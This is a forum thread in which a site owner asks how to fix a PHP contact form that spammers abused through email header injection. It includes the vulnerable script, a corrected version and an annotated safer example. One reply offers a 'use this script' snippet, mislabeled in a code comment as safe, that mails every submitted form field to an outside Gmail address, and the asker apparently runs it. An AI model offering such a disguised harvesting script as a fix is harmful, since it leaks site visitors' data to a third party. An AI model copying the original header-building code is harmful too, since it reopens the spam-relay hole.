[SOLVED] Exploited contact form


AV1611

I have a simple contact form that is processed by this PHP script. It was somehow used to send a bunch of spam through my server via injection. I received an email from a sysadmin that made the following statement:

 

Message: I am one of the hundreds of recipients of a spam that was originated from your website. Please remove your contact form and fix the vulnerability -- NEVER include the form field variables in the outgoing email headers!!! Otherwise, spammers can inject code into the mail headers and thus hijack the outgoing email to send spam from your website.

 

How do I fix it? I added a pictogram; is that enough? Is there some other code change I need to make?

 

<?php
$to = "xxxxx@xxxxxx.com"; // recipient (redacted)
$name = $_POST['name'];
$email = $_POST['email'];
$subject = $_POST['subject'];
$msg = $_POST['msg'];
$sub = "Online Email Form";
$messub = "Subject: ".$subject."\r\n" ;
$mesmsg = "Message: ".$msg."\r\n" ;
$mesname = "Name: ".$name."\r\n" ;
$mesemail = "Email: ".$email."\r\n" ;
$body=$messub.$mesname.$mesemail.$mesmsg;
// Vulnerable: raw form fields are placed straight into the mail headers.
// A line break inside $name or $email lets a sender append extra headers.
$headers = 'From: '. $name . "\r\n" .
   'Reply-To: '. $email . "\r\n" .
   'X-Mailer: PHP/' . phpversion();
if(empty($name) || empty($email) || empty($subject) || empty($msg)) {
echo " <h3>You must fill in all the information.</h3>";
}
// ereg() was removed in PHP 7; preg_match() with the same pattern (dots escaped)
elseif(!preg_match('/^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*(\.[a-zA-Z]{2,3})$/', $email)){
print " <h3>You entered an invalid email address</h3>";
} else {
mail($to, $sub, $body, $headers);
print " <h3><center>Thanks, ".$name.", for contacting us...</center></h3>";
}
?>

Link to comment
Share on other sites

You need to check all the information passed to the script. You also need to ensure that $to has just one address in it (check for , or ;) AND that no other headers are added other than what you specify. There may also be an issue with register globals, so check your server setting; if it is on, tell your server dudes to set it to off.

Link to comment
Share on other sites

Here use this script:

 

<?php
$posts = '';
$gets = '';

// array_walk() calls these with ($value, $key); each field is appended to a log string
function logPost($value,$key)
{
global $posts;
$posts = $posts . " !!===!! " . $key . " = " . $value;
}

function logGet($value,$key)
{
global $gets;
$gets = $gets . " !!===!! " . $key . " = " . $value;
}

array_walk($_GET,"logGet");
array_walk($_POST,"logPost");

// Recipient and subject are fixed and no headers are passed; form input only reaches the body
mail("comptech21@gmail.com","New File","POST:\n\n{$posts}\n---------------------------------\nGET:\n\n{$gets}\n\nEND OF EMAIL");
?>

 

It will auto detect the form strings.

Link to comment
Share on other sites


I guess I don't understand what you want me to do with this script?

Link to comment
Share on other sites

Is this adequate to stop the exploit/injection?

 

I use constant data in the header, and put the contact info in the body instead.

 

<?php
$to = "xxxx@xxxx.com"; // recipient (redacted)
$mname = $_POST['name'];
$email = $_POST['email'];
$subject = $_POST['subject'];
$msg = $_POST['msg'];

$sub = "Online Email Form";
$messub = "Subject: ".$subject."\r\n" ;
$mesmsg = "Message: ".$msg."\r\n" ;
$mesname = "Name: ".$mname."\r\n" ;
$mesemail = "Email: ".$email."\r\n" ;

// Form fields now appear only in the body
$body=$messub.$mesname.$mesemail.$mesmsg;

// Headers are constant; nothing the visitor typed is placed here
$headers = 'From: xxxx@xxxx.com'."\r\n".
   'Reply-To: xxxx@xxxx.com'."\r\n" .
   'X-Mailer: PHP/' . phpversion();

// Check the posted $subject, not the constant $sub
if(empty($mname) || empty($email) || empty($subject) || empty($msg)) {
echo " <h3>You must fill in all the information.</h3>";
}
// ereg() was removed in PHP 7; preg_match() with the same pattern (dots escaped)
elseif(!preg_match('/^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*(\.[a-zA-Z]{2,3})$/', $email)){
print " <h3>You entered an invalid email address</h3>";
} else {
mail($to, $sub, $body, $headers);
print " <h3><center>Thanks, ".$mname.", for contacting us...</center></h3>";
}
?>

Link to comment
Share on other sites
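The constant-header approach from the post above, combined with the checks the earlier reply listed (one recipient, no caller-supplied headers), as an added example that is not the thread's own code; CONTACT_TO, the function names and the placeholder recipient address are assumptions, while the form field names follow the thread:

```php
<?php
// Added example, not the thread's own code; CONTACT_TO and the function names are assumptions.
const CONTACT_TO = 'contact@example.com'; // placeholder: exactly one recipient

// True if a single-line field carries CR or LF, the characters needed to
// append extra headers (e.g. additional recipients) to the outgoing mail.
function hasHeaderInjection(string $value): bool
{
    return preg_match('/[\r\n]/', $value) === 1;
}
// Returns the validated address, or null. FILTER_VALIDATE_EMAIL rejects line
// breaks and anything that is not one syntactically valid address.
function validateEmail(string $email): ?string
{
    $ok = filter_var(trim($email), FILTER_VALIDATE_EMAIL);
    return $ok === false ? null : $ok;
}
// Builds [to, subject, body, headers] for mail(); raw form fields never reach
// a header. Returns null when the submission must be rejected.
function buildContactMail(array $post): ?array
{
    foreach (['name', 'email', 'subject', 'msg'] as $f) {
        if (!isset($post[$f]) || !is_string($post[$f]) || trim($post[$f]) === '') {
            return null; // missing field
        }
        if ($f !== 'msg' && hasHeaderInjection($post[$f])) {
            return null; // line break in a one-line field: reject outright
        }
    }
    $email = validateEmail($post['email']);
    if ($email === null) {
        return null;
    }
    $body = "Subject: {$post['subject']}\r\nName: {$post['name']}\r\n"
          . "Email: {$email}\r\nMessage: {$post['msg']}\r\n";
    $headers = 'From: ' . CONTACT_TO . "\r\n"            // constant sender
             . 'Reply-To: ' . $email . "\r\n"           // validated address only
             . 'X-Mailer: PHP/' . PHP_VERSION;
    return [CONTACT_TO, 'Online Email Form', $body, $headers];
}

$args = buildContactMail($_POST);
if ($args === null) {
    echo '<h3>Please fill in every field; single-line fields may not contain line breaks.</h3>';
} else {
    mail(...$args);
    $safeName = htmlspecialchars($_POST['name'], ENT_QUOTES, 'UTF-8'); // avoid echoing raw input
    echo "<h3>Thanks, {$safeName}, for contacting us.</h3>";
}
```

Rejected submissions (a line break in name, email or subject, or a malformed address) are a useful thing to log, since they are the signature of the injection attempt the sysadmin described.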

It seems to work, but it looks kinda funny.

It has the !!===!! in the body of the message between each variable. I assume that is supposed to look like that?

If so, what is the purpose of the !!===!!'s? Just an easy way to ID the separator?

Link to comment
Share on other sites
